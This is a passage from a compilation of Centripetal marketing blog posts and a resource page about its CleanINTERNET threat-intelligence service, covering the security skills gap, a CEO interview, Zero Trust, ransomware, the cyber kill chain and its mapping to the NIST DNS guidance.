visibility of the threat landscape, there’s increased data to analyze and translate, and employees often do not have the skills to understand the data and therefore are unable to create actionable insights. Businesses around the world are concerned about the growing cyber security skills gap, with 58% of CISOs believing that the problem of not having expert cyber staff will worsen. Human analysts are unable to deal with the overwhelming number of alerts they’re confronted with across different security solutions and are quickly faced with a large amount of false positives, which account for roughly 40% of the alerts cyber security teams receive daily, and in many scenarios, real threats are overlooked and infiltrate the network. Simply implementing threat feeds does not guarantee a strong threat intelligence program; it may lead to employees becoming overwhelmed and dealing with large quantities of threat data without vital context to find out what is real and what is not. Cyber security tools should be efficient, easy to install and configure, and should not disrupt your company’s operations or cause workplace inefficiencies, wasting business time in the process. Cyber threat teams or analysts should receive only the intelligence they need, prioritizing the cyber threats relevant to them, in a way that’s actionable and easy to understand. Centripetal understands this challenge and supports the end-to-end process. When you decide to use Centripetal CleanINTERNET, we take the time to understand your organization and make sure that the solution fits perfectly within your existing environment. Centripetal reduces misconfiguration issues as we provide “Full-service Implementation,” where our implementation team installs and configures on-site. After implementation, we handle the maintenance and any upgrades. Our highly experienced cyber threat analysts act as an extension of your existing security team and work directly with them to provide guidance and insights on new and upcoming threats, create and implement policies, and dramatically increase your organizations cyber security posture. Centripetal CleanINTERNET's service delivers a comprehensive and cost-effective solution,  whether it’s on-premise or in a virtual/cloud environment. We alleviate the skills gap burden for any size organization, regardless of industry. With Centripetal CleanINTERNET’s Full-service Implementation, you can focus on your business’ mission-critical operations, enabling internal teams to become more efficient and key in on real threats. For more information about CleanINTERNET, get in touch with our team. Our next blog will address 2nd generation cyber threat intelligence and the benefits of cyber threat shielding without any disruption to the business process. --- ### [An Interview with Centripetal's CEO, Steven Rogers](https://www.centripetal.ai/blog/interview-centripetal-ceo-steven-rogers) Published: 2020-08-21 Summary: As the CEO and Founder of Centripetal, Steven Rogers is a pioneer of intelligence based cyber defense. We sat down with Steven to find out... As the CEO and Founder of Centripetal, Steven Rogers is a pioneer of intelligence-based cyber defense. We sat down with Steven to find out more about his career in security, his role as CEO, and how he sees Centripetal growing in the future.   How did your career lead you to founding Centripetal? My background is in security; I worked on secure communications systems for the Air Force and security for things like the defense messaging system, which ran most of the US DoD. This was in the days before the Internet, but there were computer networks in use at that time that were the precursor for the Internet. Then later in my career I worked on communications and networking issues. For instance, I founded a company that built high performance routers. With this background in both networking and security, I felt that the need for intelligence in the Internet, particularly after the rise of the first generation Internet, was most prevalent. From this I decided that individual organizations should have granular, intelligent control over what traffic enters and leaves the network. At the time, this was a very unique way of approaching the problem.   What was your motivation in founding Centripetal? When the Internet came along, it brought with it the wonderful feature of allowing us to connect with anyone in the world, at any time. However, it also allows anyone to infiltrate a network and steal data from anyone else in the world. This problem goes across legal boundaries. It means that you often have no legal recourse in cases where someone steals data from you. With my background in networking and security, I felt that this issue needed to be approached from a different standpoint. The stance we take is that the individual user of the Internet should have control over who comes into their own network. They should have enough intelligence about their own traffic to ensure their network is used for their mission and nothing else. With the Internet being so vast, making decisions on fast-moving packets coming in and out of a network involves an enormous array of decisions. We observed that it’s possible, despite the huge amount of data in transit, to identify where the threats are.  We can accomplish this to a very complete degree and carefully process these threats.  Cyber threat intelligence, if you apply it properly, can become a highly effective tool to determine automatically who should come into your network and who should not, and thus gives an organization risk-based control. A decade ago I began to think this was something I really needed to work on because of my background. I came up with the solution, sought out funding, and set up Centripetal. When we started the company, no cyber security product or solution had the capability to make these kinds of decisions, and all of that technology had to be created from scratch. We developed the computer science that would enable this rapid decision-making. That was the first of many problems we had to solve which led to many more innovations.   Where do you see Centripetal in relation to the evolution of cyber security? Do you see yourself as part of second-generation threat intelligence? Really we see ourselves as the next generation of the Internet infrastructure. Internet communications and networking used to consist of relatively “dumb” functions like routing and switching. Now the communications needs to be much more precise, secure, and intelligent. Internet-working can now be intelligence-driven. We take a different approach to security but it’s an approach that can be built into the diverse cloud and physical environments of today’s Internet.  There is no other software-based system in the world that can match what Centripetal delivers in terms of its deployment, cost-effectiveness, and overall security value we deliver to the client. Intelligence-based security is just getting started. In terms of the future of cyber threat intelligence, I think of a world where, while we may not have legal jurisdiction over every source, we can identify and keep track of threat actors who aim to cause damage and hold these actors accountable. What’s possible to accomplish with intelligence, and the number of intelligence sources is expanding every day.  This ensures that there’s a real incentive to put measures in place to protect networks, ultimately leading to a cleaner and safer Internet traffic – hence our service brand: CleanINTERNET®.   What does your day-to-day role look like at Centripetal? At Centripetal, Jonathan, or COO, and I split responsibilities in terms of running the business. Jonathan takes charge of security operations which encompasses the service and technologies that we deliver to our clients. He’s heavily involved in the client-facing business units since those all reach back to our service.  I focus on the technology and long range innovations that we deliver through our research investments. This is where my expertise lies, and I’m running our engineering and research teams.   As an organization, what values define your culture? Our culture is customer-focused.  Everything happens by putting the cyber security needs of our customer first. If there’s something that needs doing for our customer, we try very hard to drop everything and will put the whole company on it, if necessary.  Making the customer’s life easier is what we care about most. We are highly customer-focused and oriented. Some people believe that companies will inevitably become less customer-focused, the larger they get. This is where Centripetal differs from other organizations. We’re customer-focused rather than sales-focused and have been since the beginning. Our approach of investing our own capital rather than relying solely on venture capital has put pressure on me. We’ve had to be much more patient, but we’ve built a better foundation than other companies in our industry. It’s very difficult to do. Ultimately our financial approach has allowed us more control and given us a unique company environment and approach to growth, which strengthens our team’s shared culture and produces a much better solution for our clients.   What are you most proud of about Centripetal? I’m most proud of the team and the way we’ve held together. 80% of our team have stayed since they joined; we don’t have many people who leave the company despite the difficulties we’ve had to overcome. The best companies have high retention rates and that’s important to us. We haven’t been afraid of growing slowly, as we had to take the time to pioneer the technology, which was a long process. If it’s a big enough idea, it’s worth it to take your time and build it right. When we started the company, not even the biggest supercomputer could make decisions at the rate we needed.  So, our technology is very leading-edge. We launched the company in 2009, and we sold to our first customer in 2015. With a long-term investment, you have to be able to confidently see the future of security. It took a lot of faith in our technology and its value.  That’s why I’m even more excited today than when we started.   What do you do when you’re outside the office? It’s not a good idea to have work occupying your mind 24 hours a day, so I have a variety of hobbies. I’m an outdoors person in both winter and summer; I like to travel, hike, dive, and sail, and last year I hiked up Mount Monadnock in New Hampshire.   What are your ambitions for Centripetal? I see Centripetal growing and opening up new offices with in-country client teams in Europe, Asia, and around the world. We’re selling outside of the US now and will be looking at expanding there in the next 12 months or so. I don’t see acquisition as part of the near future; we want to keep good technology and research as the centre of our business and avoid becoming transactional. We’ve lived security for a long time and we’re in position now to help see cyber become a marginal problem. When we do that right the financials will work themselves out. --- ### [CTI Challenges Faced by Mid-size Organizations](https://www.centripetal.ai/blog/threat-intelligence-challenges-mid-size) Published: 2020-08-03 Summary: Cyber Threat intelligence is, the collection and analysis of indicators of past, current, and potentially real future threats. The evolution of the cyber security landscape has initiated a chess game between security teams and hackers. As cyber security teams take a toughened stance on cyber threats and continuously invest in improving their cyber security posture, hackers aim to exploit their vulnerabilities with increasingly sophisticated techniques. Hackers now attack every 39 seconds, and security breaches have increased by 67% since 2014. In opposition, cyber security spending has grown, with over $124 billion spent on security products and services in 2019 alone. What is Cyber Threat Intelligence? Cyber Threat intelligence is, the collection and analysis of indicators of past, current, and potentially real future threats. CTI marks a pivotal point in the change of security approaches from reactive to proactive, enabling a proactive defense against threats that emerge before they strike on a mass scale, but to do this the threat data must be understood, relevant, actionable, and prompt. While the majority (77%) of companies recognize that threat intelligence is important or very important to their overall security posture, most organizations can only research and utilize between 1 and 100 threat indicators weekly. Aggregating CTI feeds is a way of compiling large amounts of threat intelligence data into one place; and leveraging high confidence and high fidelity data provides an early warning system for potential indicators of compromise. However, some data overlaps when comparing threat feeds, meaning  one feed is no longer enough. With each provider’s set of feeds costing between $30,000 and $500,000, it’s a confusing and expensive process. Additionally, cyber threat teams often don’t understand how complex it is to manage multiple feeds and leverage the information that the feeds provide. On top of this, it’s difficult to recruit new and retain highly skilled cyber threat analysts due the growing security skills gap. Global cyber security skills shortages have now surpassed 4 million, with 65% of businesses reporting a shortage of cyber security staff. The challenge for mid-size organizations This is particularly challenging for mid-size organizations, who lack the specialized staff and extra revenue to invest in threat intelligence solutions, learn how to effectively use them, and scrutinize data for the relevant threats. With 50% of small and mid-sized businesses suffering at least one cyberattack in 2019, the threat to mid-tier organizations is growing. After identifying this need, we set out with the mission to develop a cost-effective threat intelligence service that provides a seamless, efficient, and scalable solution to businesses of all sizes regardless of industry. When Centripetal was founded in 2009, we carried out extensive in-house research and development before creating our threat intelligence gateway, the first of its kind, and have since evolved our solution into our Cyber Threat Intelligence service, CleanINTERNET. Small and mid-sized businesses spend an average of $955,429 recovering from cyber-attacks; CleanINTERNET provides cyber threat intelligence and analysis for a fraction of this price. By leveraging over 100 sources of CTI with over 3,500 feeds, the solution saves millions of dollars on separate providers and feeds, as well as helping to automatically enforce standards such as PCI DSS, ITAR and HIPAA and therefore helping to avoid non-compliance fines. Our Full-service Implementation means you can be set up within hours and receive personalized support throughout the process, with our elite team of cyber threat analysts bridging the security skills gap within your organization. This means you can focus on your business without the constant worry of cyber threat, and with little disruption to company operations. Using dynamic intelligence on a mass-scale for Shielding and Advanced Threat Detection, we support some of the largest financial services institutions, retailers, healthcare providers and government agencies in the world. Our customer base has kept growing over the last few years and is now deployed in well-known organizations and many government entities worldwide. Speak to our team and see how CleanINTERNET can benefit your organization. Our next blog will be an interview with our CEO, Steven Rogers, about his career in the US Air Force Security Service and White House communications division and how this has led him to pioneer the threat intelligence gateway market. --- ### [Evolving Trust But Verify](https://www.centripetal.ai/blog/trust-but-verify-threat-intelligence) Published: 2020-07-28 Summary: Much like Russia's “Doveryai No Proveryai”, Zero Trust is the belief that trust can be exploited, so security frameworks should assume every attempt to access the network is a threat until confirmed… In 1987 at the INF (Intermediate-Range Nuclear Forces) Treaty, President Ronald Reagan used the phrase ‘trust but verify’ when discussing relations between the United States and the Soviet Union. Translated from an old Russian phrase used by Vladimir Lenin and Joseph Stalin, “Doveryai, No Proveryai'' is the idea that a responsible person verifies everything before committing themselves to business, even if it's with a trusted individual. This was to become one of President Reagan's greatest quotes, applied to cybersecurity and many other circumstances for almost four decades. In 2021, this concept was modernized as the US federal government and the cybersecurity industry pivoted toward a new security framework: Zero Trust.   What is Zero Trust? Much like Russia's “Doveryai No Proveryai”, Zero Trust is the belief that trust can be exploited, so security frameworks should assume that every single attempt to access the network is a threat until confirmed otherwise. This means that understanding who every user is and what endpoint they’re coming from, even if they’re inside the firewall, is imperative to an organization's cybersecurity posture. To prevent network infiltration and data exfiltration, Zero Trust draws on advanced threat intelligence to verify each user.   Verification through threat intelligence Threat intelligence helps to determine whether a threat is viable and other pertinent information that is critical in protecting networks and data. A simple example would be verifying an individual entering a country with a passport. Is the passport valid? Is this person a threat to national security? What information determines if this person is a potential threat or not? Verification can be used in various forms to determine the trustworthiness of an individual, such as biometrics, visual identification, and IDs. Zero Trust intelligence uses practices like multi-factor authentication, IAM, orchestration, analytics, encryption, scoring, and file system permissions to verify each user.   How to implement Zero Trust Today’s cyber environment is extremely challenging. Cyber threats are increasing and evolving on a dramatic scale, much of the workforce has adopted hybrid working, and the skills gap, tightened budgets, and compliance maintenance are prevalent problems. With Centripetal’s advanced threat intelligence service, CleanINTERNET, our team performs in-depth threat analysis and shielding on your business’ behalf, delivering comprehensive, relevant threat findings directly to your team. This creates a Zero Trust environment within your network, alleviating the burden of implementation and maintenance from your security teams, as well as saving your business millions of dollars on separate threat feeds. Get in touch to find out more about the CleanINTERNET solution.   This article was updated March 2022. --- ### [AI-Analyst within CleanINTERNET Service](https://www.centripetal.ai/blog/ai-analyst-cleaninternet-service) Published: 2018-08-11 Summary: Centripetal has integrated advanced AI-Analyst functionality into our CleanINTERNET service, enhancing threat event application. Centripetal will be demonstrating Artificial Intelligence AI-Analyst™ at the RSA 2018 Conference, which is an advanced technology embedded within our CleanINTERNET® service. See “AI-Analyst” threat profiling in action! Centripetal has integrated advanced AI-Analyst functionality into our CleanINTERNET service engagement. This technology enhances our threat event application, which is used by our cyber analysts to understand critical real-time streaming event data. The AI-Analyst is an invaluable intelligence-driven tool that is used to massively expand the coverage of the analysis in the era of applied intelligence. The functionality of the AI-Analyst toolset adds machine learning, extensive operational event data, and heuristic algorithms to dynamically risk triage threat events. What does AI-Analyst do and what is the benefit of AI-Analyst? AI-Analyst technology uses machine-learned artificial intelligence to accelerate the cyber analysts' workflow.  Cyber analysts and SOCs are at least 100X more productive and efficient at identifying and remediating attacks when they use AI-Analyst. The demo at RSA will be held in the Department of Homeland Security Booth - South Hall - #1839: Tuesday 4/17 -- 2:45 pm Wednesday 4/18 -- 12:15 pm Thursday 4/19 -- 1:15 pm AI-Analyst directly addresses three (3) distinct issues that place a significant strain on cybersecurity practitioners today: Automatic critical threat identification: Serious reportable attacks are often hidden in the flood of security events. Event analysis requires an enormous commitment of cyber analyst man-hours to manually investigate threats on only a fraction of applied intelligence. In the era of applied intelligence, the event volumes are beyond a human only workflow. AI-Analyst prioritizes the most valuable resource in the security workflow: the expert human analyst. Cyber security talent shortage: The industry faces an extreme shortage of cyber analysts. This has been identified by many companies as the single most critical problem in the cyber industry. By leveraging cross-community labor and cyber information sharing, our CleanINTERNET Service and AI-Analyst increases the effectiveness of the limited security staff within an organization. Shorter time-to-resolution: To limit or prevent damage, cyber analysis must resolve quickly and accurately. AI technology can dramatically reduce the current cyber workload, the time to remediate and even be configured to automatically stop attacks. By listing events ranked by severity and high confidence, analysts can cut through the noise and react to the highest priority events.  ........................................................................................................................... “With CleanINTERNET service, our cyber analysts work with advanced intelligence tools for performing their security functions more effectively and efficiently. By deploying CleanINTERNET service, along with our AI-Analyst tools, we can offload at least 90% of the enterprise event volume and rapidly target in on the advanced threats where the expert human analyst is needed."  Dr. Sean Moore, Chief Technology Officer and AI-Analyst principal investigator, Centripetal  ........................................................................................................................... --- ### [Dark Web is Scarier Than Many People Realize](https://www.centripetal.ai/blog/dark-web-scarier-than-people-realize) Published: 2018-07-27 Summary: The Dark Web is a real place and contains a frighteningly large amount of stolen data, aggressive phishing schemes, hoaxers, and black-market activities. For many people, thinking about the dark web evokes images of seedy hackers with malicious intentions, cloaked in black hoodies hovering intently over a computer. We picture bad actors quickly typing away while sitting at a corner coffee shop. The green text flashes on a black screen at speeds where it is nearly impossible to read, with progress bars indicating uploads of a virus or maybe the transfer of money from unsuspecting victims to a secret offshore account. These dramatizations may be extreme, but nonetheless, the Dark Web is very real and very dangerous. The Dark Web The Dark Web is a very real place and contains a frighteningly large amount of stolen data, aggressive phishing schemes, hoaxers, botnets, and black-market activities. Much of the personal data that makes it way to the dark web comes from people like us and is for sale at an astonishingly low price. It was recently discovered that Remote Desktop Protocol (RDP) access to a major international airport’s security and building automation system was being sold for only $10. For less than what many spend on lunch, you could gain access to what should be a highly secure environment! Another example of what can be solicited on the Dark Web is a stolen social security number, which can sell for as little as one dollar. Once a hacker has access to a compromised machine, the potential harm to a company is staggering. Not only does the attacker have access to potentially sensitive data on that device, but they can also utilize that machine to move laterally throughout the enterprise network and quickly compromise additional systems. Installing ransomware, planting false flags (a tactic where an attacker will make it appear as if his/her illegal activity originates from the victim’s machine), becoming a source for spam origination, being used as a crypto miner, or being used for credential harvesting that further compromises the organization are all common hacker activities and outcomes. It can take weeks, or even months, for an organization to realize their network had been compromised, if they realize at all. “Just as we check the doors and windows when we leave our homes, organizations must regularly check which services are accessible from the outside and how they are secured,” McAfee recently wrote in a blog post detailing a specific breach. Centripetal's Intelligence Centripetal's intelligence policies are built from complex combinations of static and dynamic rules, so that rules and policies can be constructed to filter any combination of the following elements, which are typically part of the commercial indicator of compromise. In addition to malicious IPs, we conduct thorough inspection on every inbound and outbound packet including: Source IP, Destination IP, and IP range (v4 or v6) Port or Port Range Protocol Domain URL FQDN Dynamic, multi-dimensional indicators of compromise Centripetal’s Active Threat Blocking enforcement solution, the CleanINTERNET service, can leverage billions of threat indicators that are correlated and filtered at network edge, against millions of complex security rules. We enable automatic enforcement (blocking and shielding) to support real enterprise speeds and convert indicators to action on a continuous basis as intelligence feeds are dynamically updated. By taking hundreds of millions of indicators and distilling them to a finite number of rules, we are able to prevent millions of threats and deliver an unprecedented intelligence-led defense. Learn more about CleanINTERNET services here --- ### [Network Security-as-a-Service](https://www.centripetal.ai/blog/network-security-as-a-service) Published: 2018-05-17 Summary: Centripetal’s CleanINTERNET, a fully managed Network Security-as-a-Service, instantly puts thousands of analysts to work in your defense. A Perfect Solution If You Have Limited Cyber Staff Common security team challenges: Not enough Staff. Lack of the right Skills. Limited IT Budget. Too much Noise. Are you one of the many companies challenged with a limited security staff, you don’t have the right skillsets in house, you’re faced with a high turnover of technical talent, too many incoming security alerts to handle them all properly… Centripetal has the perfect solution that will help you gain a superior level of cyber protection, and also supply the cyber analyst expertise you require, to manage, monitor, and control your company’s important security posture. Fully managed Network SaaS When you subscribe to Centripetal’s CleanINTERNET, a fully managed Network Security-as-a-Service, it’s instantly putting thousands of analysts to work in your defense. Using our advanced filtering and shielding enforcement technology, we can automatically protect your network against most known malicious threats, which have been researched by thousands of analysts working at hundreds of cyber threat intelligence provider (CTIP) organizations. We aggregate, correlate and apply the best threat intelligence feeds available in the industry to persistently protect your network. Millions of Indicators of Compromise are processed in a set of tightly defined rules, to continuously monitor both inbound and outbound activity. The best part of all is that live cyber analyst expertise is an integral part of the solution, which instantly extends the capabilities of your current staff. Most people that are involved in security operations and strategic planning are more than familiar with the alarming statistics surrounding the lack of talent and skills in the security area: A 2018 Cybersecurity Jobs Report estimated that there will be 3.5 million unfilled cybersecurity jobs by 2021, up from 1 million openings in 2016. In 2017, the U.S. employed nearly 780,000 people in cybersecurity positions, with approximately 350,000 current cybersecurity openings, according to CyberSeek. A recent 2017 ESG Research note mentioned 45 percent of organizations that were surveyed had a problematic shortage of cybersecurity skills. When surveyed, many security leaders highlight that their cybersecurity team was not large enough for the size of their organization and many indicated that the cybersecurity team cannot keep up with the workload.   CleanINTERNET to the rescue! Let’s say you are trying to ensure that your site and users are fully protected from all the bad actors that are constantly trying to scam, breach, attack or cause harm on a daily basis.  Unfortunately, as a SMB or remote branch office, you are faced with the same type and quantity of malicious threats as a large enterprise. Without the proper staff and budget required to deploy a reliable and proactive protection solution, you cannot succeed. Suspicious URLs, phishing schemes, bad actors, malware, etc. will continually try to infiltrate your network and users. With limited staff or skills, it is almost impossible to deliver the quality of protection your users require. Enter Centripetal with CleanINTERNET!  Not only can we quickly deploy a high-performance Threat Intelligence Gateway (TIG) in your environment, but we can also introduce real-time threat intelligence feeds to reliably block and shield known threats at scale. The best part of this NSaaS offering is that you will have access to expert cyber analysts and online executive status reports to help you understand the power, effectiveness, and value of the solution for your organization.                      CleanINTERNET NSaaS  ==  Intelligence | Enforcement | Analytics Here are just a few of the immediate benefits that CleanINTERNET, Network Security-as-a-Service, delivers: An operating expense (OPEX) based solution that is easy on your budget, with a low manageable monthly cost Hardware, software and services that are all tightly bundled together to deliver the best CTI security solution possible Our professional services staff will coordinate the implementation and configuration Live best-in-class core threat intelligence feeds that are continually updated in real-time Custom rule sets to ensure your corporate security policy is enforced Blocking and shielding against known threats – IP, URL, Domain, FDQN, etc. Free up your current security staff to focus on more important activities Immediate ‘same day’ Time-to-Value Learn more about CleanINTERNET and you can start a free trial. --- ### [Centripetal’s QuickThreat app for Splunk](https://www.centripetal.ai/blog/centripetal-quickthreat-app-splunk) Published: 2018-03-04 Summary: The release of QuickThreat for Splunk, enables any Centripetal user to integrate their intelligence workflow directly in their Splunk SIEM. Centripetal hit another major product milestone and successfully released a QuickThreat® dashboard built natively for Splunk. The release of QuickThreat for Splunk, an industry standard SIEM platform, enables any Centripetal user to integrate their intelligence workflow directly in their Splunk SIEM. The RuleGate management application is the primary tool to configure the threat intelligence gateway appliance and gather basic operational data of the device. The Splunk application is used to provide an intuitive graphical user interface to analyze, and take action upon, critical real-time threat data as part of the intelligence workflow. Porting event logs to the Splunk app is an efficient and powerful method to view the data provided by Centripetal’s solution in a rich visual experience. The app has become an invaluable management tool used by security analysts to maximize the usefulness of their threat intel. The analytics tool is available to all of our clients and features an advanced graphical user interface to manage data sent from our threat intelligence gateways. This real-time statistical threat data allows security analysts to thoroughly understand their threat landscape, network performance and security posture. The QuickThreat App for Splunk is fully certified and validated by Splunk. The app was built by Centripetal and has met Splunk's high standards for application design and development. Being awarded the “Green Shield” on the QuickThreat app signifies that Centripetal is 100% certified as a trusted Splunk app. Get QuickThreat App for Splunk here Splunk users can now take advantage of Centripetal's unique capability to apply threat intelligence at-scale and enforce it in the network. No other technology can enforce at this scale. Centripetal’s solutions empower security teams to persistently prevent over 90% of the known threat ecosystem as delivered from 70+ threat intelligence providers. A few key benefits of the new QuickThreat App for Splunk: Visual graphical user interface Correlate threat intel to automate network enforcement Reduce “chatter” and volume of events found Easily adjust threat intel filtering of malicious activity   Product Name: QuickThreat® for Splunk Availability: Now Centripetal protects organizations from advanced threats by operationalizing intelligence-led security for organizations of any size. --- ### [Security Service Engagement That Delivers Rapid Time-to-Value](https://www.centripetal.ai/blog/security-service-engagement) Published: 2018-02-14 Summary: The CleanINTERNET security service engagement consists of 5 key phases, spanning from planning through to continuous operation and reporting. We all want CleanINTERNET. A connection to and from the outside world that is free of all known viruses, phishing schemes, malicious attacks, cyber exploits and the like. A clean connection that keeps the bad actors away from our sensitive data and important applications, so that an organization can feel safe in using the business resources and security service they need to be productive. Unfortunately, we live in a world today where continuous cyber threats are plentiful and all too common. There are more than 720 million hack attempts every 24 hours worldwide, 60% of all traffic hitting your network is from malicious bots, and a high percentage of all emails contain spam content. The number of emails carrying malware have increased to new highs, with one in every 359 emails carrying a malicious payload, according to a recent Symantec Intelligence Report. The good news is… Centripetal has a solution that addresses this problem head on, one that provides immediate positive results in cleaning up the network from known threats upon activation. The best part is that the solution is bundled as a fully managed service that is both cost effective and very quick to deploy. Once implemented the solution delivers continuous intelligence driven protection and a comprehensive security analytics dashboard to help understand the threat surface that is attacking your network. The CleanINTERNET service With the CleanINTERNET service, there is no need to buy or maintain hardware, the service offering is designed to be all inclusive. Centripetal will deploy the necessary components for the system, as well as perform the implementation and ongoing maintenance. The CleanINTERNET service allows you to realize value immediately upon activation. The provisioning of CleanINTERNET service begins with the deployment of a physical or virtual threat intelligent gateway enforcement point at the outermost perimeter of your network. The device is a high-performance gateway, operating at line speed with extremely low latency. The deployment configuration is in-line, which allows real-time deep inspection of every packet against applied cyber threat intelligence feeds. Branch office deployments as low as 100 Mbps, up through high-performance data center and enterprise network environments with 100 Gbps of throughput are supported. The CleanINTERNET service engagement consists of 5 key phases, which span from planning, implementation, all the way through to continuous operation and reporting. The engagement begins with reviewing our Client's network configuration and creating an implementation plan. The strategic goals of the engagement include: Ensure a smooth and quick implementation, Ensure a rapid Time-to-Value (TTV), Shield the network from known threats, and Deliver Cyber Threat Intelligence report data by a Centripetal Security analyst Centripetal's Professional Services team will oversee every step of the engagement journey, which include the following 5 key steps. The CleanINTERNET service can be up and operational within 1-2 weeks. Pre-Deployment Planning: A Centripetal Solutions Architect will meet with Client's technical staff to review network configuration, connection criteria, and complete the required network implementation survey. (Typically requires 30 minutes to one hour) Delivery & Installation:  Centripetal to deliver pre-configured threat intelligent gateway to client's site. Client or Centripetal staff to install devicde and any required taps, as well as perform initial software configuration. (Typically accomplished in less than two hours) Initial Data-View:  Once data is flowing through the threat intelligent gateway (in a passive configuration), Centripetal will provision client access to real-time visualization of inbound and outbound threats made available through the CleanINTERNET portal. If Client desires onsite SIEM access, then Centripetal will provision local syslog. Shielding & Advanced Threat Detection: Centripetal will work with Client to develop Client-specific policies to implement coverage at Client’s direction and to determine Client’s approval & reporting procedures. These include both shielding for known threats and the detection of advanced threats. (Continuous Service) Reporting: Centripetal will work with Client to develop enterprise specific risk models, alerts, and reporting procedures for both operational reporting and executive reporting. Centripetal to present monthly ongoing reports of findings and preventive actions. (Continuous Service) You can also learn more about CleanINTERNET here and you can start a free trial here. --- ### [Zero Days and Cyber Threat Intelligence](https://www.centripetal.ai/blog/zero-days-cyber-threat-intelligence) Published: 2016-04-11 Summary: While there is no silver bullet for zero day detection, threat intelligence can help in reducing the opportunities for exposure. While there is no silver bullet for zero day detection, threat intelligence can help in reducing the opportunities for exposure. The RuleGate® appliance using Cyber Threat Intelligence can detect/block the exploit from reaching the client, as well as detect/block its command and control communication if the exploit is installed. During the life cycle of Lockheed Martin's 'Cyber Kill Chain' the RuleGate can detect/block at four of the seven stages, namely 4, 5, 6 and 7.   4: Exploitation: Here traditional hardening measures add resiliency, but custom capabilities are necessary to stop zero-day exploits at this stage. EG: Block compromised domains with The Media Trust threat intelligence 5: Installation: Endpoint instrumentation to detect and log installation activity. Analyze installation phase during malware analysis to create new endpoint mitigations. EG: Block the transmittal of malware from its source with Symantec Malware Sources. 6: Command and Control: The defender’s last best chance to block the operation: by blocking the C2 channel. If adversaries cannot issue commands, defenders can prevent impact. EG: Block C2 communication with Proofpoint ET CNC Indicators. 7: Actions on Objectives: The longer an adversary has CKC7 access, the greater the impact. Defenders must detect this stage as quickly as possible by using forensic evidence – including network packet captures, for damage assessment. EG: Apply CrowdStrike Threat Intelligence to the Network. Summary: Although RuleGate cannot detect the zero day exploit itself in stage 4, RuleGate can protect users in the following ways: From getting the exploit from the site that serves up the exploit. Preventing the exploits transmission to the host. Detecting/blocking the exploits communication to Command and Control. Detect existing infiltrations with new intelligence. Threat Intelligence can be applied at multiple stages in the cyber kill chain to protect against zero days exploits. For more information, MITRE provides an excellent summary on the Cyber Kill Chain and Threat-based Defense --- ### [Ransomware on the Rise](https://www.centripetal.ai/blog/ransomware-rising) Published: 2016-03-31 Summary: Ransomware is a disturbing trend on the rise among cyber hackers and unfortunately, this trend is just the beginning. The use of ransomware is a disturbing trend on the rise among cyber hackers. Ransomware is sent to a company, or to an individual user, through an email phishing method. This email method has recently been successful in tricking unsuspecting individuals to open emails that appear trustworthy but are not. Once the email is opened, the ransomware spreads through a company’s network. The ransomware then encrypts files, and will not unlock unless the ransom is paid. An article on CNNMoney.com discussed the recent hacking and deployment of ransomware into Methodist Hospital’s network, in western Kentucky. In this case, the hackers’ attempts were unsuccessful. Methodist Hospital chose not to pay the ransom, in order to revive their computer systems. Instead, the hospital chose to simply shut down the affected areas. Other hospitals have chosen different methods for handling these attacks; some have paid the ransom to regain access to their files. Likely these attacks will continue to occur, unless hospitals and other companies with sensitive data, observe this trend and take the necessary steps to guard their networks. One way for these hospitals to secure their networks from ransomware and other cyber attacks, is to install Centripetal Networks RuleGate appliance. The RuleGate filters all of the traffic on a company’s network and monitors for any indicators of attack. The RuleGate ingests threat intelligence and enforces polices based on the information it receives. Network security then configures the RuleGate to block, alert, or monitor based on any traffic hitting those policies. In addition, Centripetal’s QuickThreat product allows an enterprise to visualize the matching threat intelligence events that are occurring on a company’s network in real-time. Using QuickThreat also allows analysts to adapt their protections in real time. The differentiating factor between the RuleGate and other cyber protection systems, is that the RuleGate scales to the size of the threat. Therefore, hospitals and other companies who possess private information, need a tool that can handle the magnitude of cyber attacks that likely can and will come. Unfortunately, the trend of cyber attacks involving ransomware is just beginning. Since the event at Methodist Hospital on March 16th, MedStar Health Systems computer systems were attacked and encrypted, possibly by ransomware. Instead of waiting to be infiltrated, organizations should take action immediately to update their systems and install a threat intelligence defense system. Centripetal’s RuleGate appliance and QuickThreat product together offer flexible deployment and enforcement of security policies on threats at full line rate, without any change in network performance. This level of protection allows visibility into who is attacking a network at the very moment it is occurring, and then can stop it. Organizations who are not practicing network security of this level, should move quickly to take steps to safeguard their data, since cyber attacks are increasing in velocity and proportion. --- ## Resources ### [CleanINTERNET DNS & NIST Special Publication 800-81 Revision 3](https://www.centripetal.ai/resources/cleaninternet-dns-nist-special-publication-800-81-revision-3) Published: 2026-04-15 Summary: NIST 800-81r3 redefines DNS as a security control. This resource maps CleanINTERNET DNS to the guidance, showing how it blocks threats, enforces policy, and supports Zero Trust. CleanINTERNET DNS & NIST Special Publication 800-81 Revision 3In March 2026, the National Institute of Standards and Technology published NIST Special Publication 800-81 Revision 3: Secure Domain Name System (DNS) Deployment Guide — the first major update to DNS security guidance in over a decade. The revision reflects a fundamental shift in how organizations should think about DNS: not just as infrastructure to be secured, but as a security control in its own right. The document's central recommendation is clear: deploy protective DNS wherever technically feasible to block malicious traffic, enforce security policy, generate forensic telemetry, and integrate with a defense-in-depth or zero trust architecture. CleanINTERNET DNS (CIDNS) was purpose-built for exactly this mission. This document maps CIDNS's capabilities to each relevant section of NIST SP 800-81r3, demonstrating how the service addresses the publication's recommendations out of the box. What Is Protective DNS?NIST defines protective DNS as "a DNS service that is enhanced with security capabilities to analyze DNS queries and responses and take action to mitigate threats" (Section 2.1). The publication identifies five goals for protective DNS deployment:NIST Protective DNS GoalCIDNS CapabilityBlock harmful traffic at the point of domain name resolutionEvery DNS response is validated against the full threat intelligence dataset before delivery to the clientCategorize and filter traffic that violates organizational policyIntelligence-driven filtering with configurable policy per customerProvide real-time and historical DNS data for digital forensics and incident responseComplete query and response logging delivered to your SIEMIntegrate with the wider security ecosystem as part of defense-in-depthWorks alongside your existing firewall, IDS, and endpoint tools — additive security layerFacilitate compliance with regulatory or contractual requirementsEnforces policy at the DNS layer with full audit trailSection-by-Section Conformance2.1.1 — Threat Intelligence and TelemetryNIST recommends integrating threat intelligence into the DNS resolver via DNS firewalls, response policy zones (RPZs), or similar mechanisms. The publication emphasizes that "the consumption and deployment of threat intelligence services should be considered as part of any protective DNS deployment."How CleanINTERNET DNS conforms:CleanINTERNET DNS validates every IP address in DNS responses against Centripetal's curated threat intelligence — aggregated from 3,500+ feeds spanning malware, phishing, ransomware, command-and-control, and other threat categoriesCleanINTERNET DNS evaluates all outbound DNS queries against the same curated threat intelligence dataset, blocking resolution attempts for known-malicious domains before any upstream connection is establishedIntelligence is synchronized to CleanINTERNET DNS infrastructure in near real-time via streaming 